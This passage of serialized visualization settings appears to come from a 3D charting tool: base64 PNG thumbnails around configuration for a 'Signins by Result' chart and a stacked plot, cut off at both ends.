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', 'Title': 'Signins by Result', 'TitleSize': 1, 'TransitionIndex': 0}, {'$type': 'HoloGraphBridge.Plots.LinearStackPlot, HoloGraphBridge', 'AxesDivisions': [35, 7, 42], 'AxesDivisionsAuto': [False, False, False], 'AxesEdgesShow': [True, True, True], 'AxesGridlinesShow': [True, True, True], 'AxesLabelsOrientation': [1, 1, 1], 'AxesLabelsShow': [True, True, True], 'AxesLabelsSize': [0.25, 0.39, 0.42], 'AxesTicksShow': [False, False, False], 'AxesTitleSize': [0.5, 0.5, 0.5], 'PositionFill': [False, False, False], 'PositionIndex': [18, -1, 20], 'PositionRescale': [False, False, False], 'PositionReverse': [False, False, False], 'PositionScale': [1, 7.9, 1], 'StackBuckets': [34, 0, 8], 'StackBucketsAuto': [True, True, True], 'StackBucketsFill': [False, False, False], 'StackGroup': False, 'StackOrderAuto': True, 'StackOrderIndex': 42, 'StackOrderReverse': False, 'StackRescale': False, 'StackSpacing': [2, 1, 0], 'StackSpacingAuto': [False, False, False], 'StackSumIndex': -1, 'StackWidth': [8, 1, 29], 'StackWidthAuto': [False, False, False], 'CameraRotation': [0, 0, 0, 1], 'CameraTranslation': [0, 0, 0], 'ColorFill': False, 'ColorIndex': 42, 'Filter': -1, 'LabelColumns': [{'Index': 26, 'Name': False, 'Units': False}, {'Index': 35, 'Name': False, 'Units': False}], 'Layers': [], 'ManipulationRotation': [True, True, True], 'ManipulationScale': True, 'ManipulationTranslation': [True, True, True], 'ModelRotation': [-0.27962374687194824, -0.5746225714683533, -0.15575651824474335, 0.7532333135604858], 'ModelScale': 4, 'ModelTranslation': [-1.642568588256836, 1.8621183633804321, -4.863327980041504], 'OrderIndex': 0, 'PaletteColors': [242, 27, 63, 255, 41, 191, 18, 255], 'PaletteDivisions': 2, 'PaletteDivisionsAuto': True, 'PaletteReverse': False, 'Selection': -1, 'Table': 0, 'TextSize': 0.5, 'TextWidth': 5, 'Thumbnail': 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEACAYAAABccqhmAAAgAElEQVR4Xu2dB5QcxdHHay9I6CSBJYQCQYDI0Yhgoo1NzkEYEAYMNphgMthgExzABJNMEDmZnKOMySLYRCMLmSzQB4igjITSSXe3u9/7taijr29mb9Pt7e1Wv8fjtDPT01MzVV3hX1UJEUmLDaOAUaAqKZAwAVCV790e2ijgKGACwD4Eo0AVU8AEQBW/fHt0o4AJAPsGjAJVTAETAFX88u3RjQImAOwbMApUMQVMAFTxy7dHNwqYALBvwChQxRQwAVDFL98e3ShgAsC+AaNAFVPABEAVv3x7dKOACQD7BowCVUwBEwBV/PLt0Y0CJgDsGzAKVDEFTABU8cu3RzcKmACwb8AoUMUUMAFQxS/fHt0oYALAvgGjQBVTwARAFb98e3SjgAkA+waMAlVMARMAVfzy7dGNAiYA7BswClQxBUwAVPHLt0c3CpgAsG/AKFDFFDABUMUv3x7dKGACwL4Bo0AVU8AEQBW/fHt0o4AJgAr5Bt58801Zb731pGfPnnLppZfKySefXCFPZo/RmRQwAdCZ1C3h3Ol02gmAd955R371q1/JDTfcIMOGDZOJEydKIsFrXjx69OghTU1NJVyZ3aqcKWACoJzfTpZrg/lh8kWLFskGG2wg77//vrz11luy++67y5w5c+RPf/qTLLfccnLOOefIT37yE7niiiuynNlOq3QKmACosDd84oknymWXXSapVEowC37wgx8IAqK+vl5aWlrc39/73vfc33PnzpWamhqZNm2aHH744fLYY4+1UmP69OmyzDLLVBh17HFCCpgAqNBvAkaHyWF8tINtttlGnnvuOdl2223lqaeekrq6OhkxYoQ89NBDTlgsvfTSMmvWrFZqcP1nn30mK620kpxyyilyySWXtKMUJsb//d//VSgFq+OxTABUx3uOfUoY/7333pNBgwa1OWfAgAFy++23y8477yyTJ0+Wd999V7bbbrs25/z4xz+WF154QQ455BC59dZbq5yS3fPxTQB0z/fW6aveYYcd5NVXX3VmwqhRo+SEE06QZDLZel9MjbXWWkuOOOIIp2F8+umnzvn47LPPOjPj4IMPdgIkHGgeaCY2yoMCJgDK4z2U7SoGDhzo/APnnXdemzUSSSCioA7I8ePHy+abby6NjY1y2mmnOafj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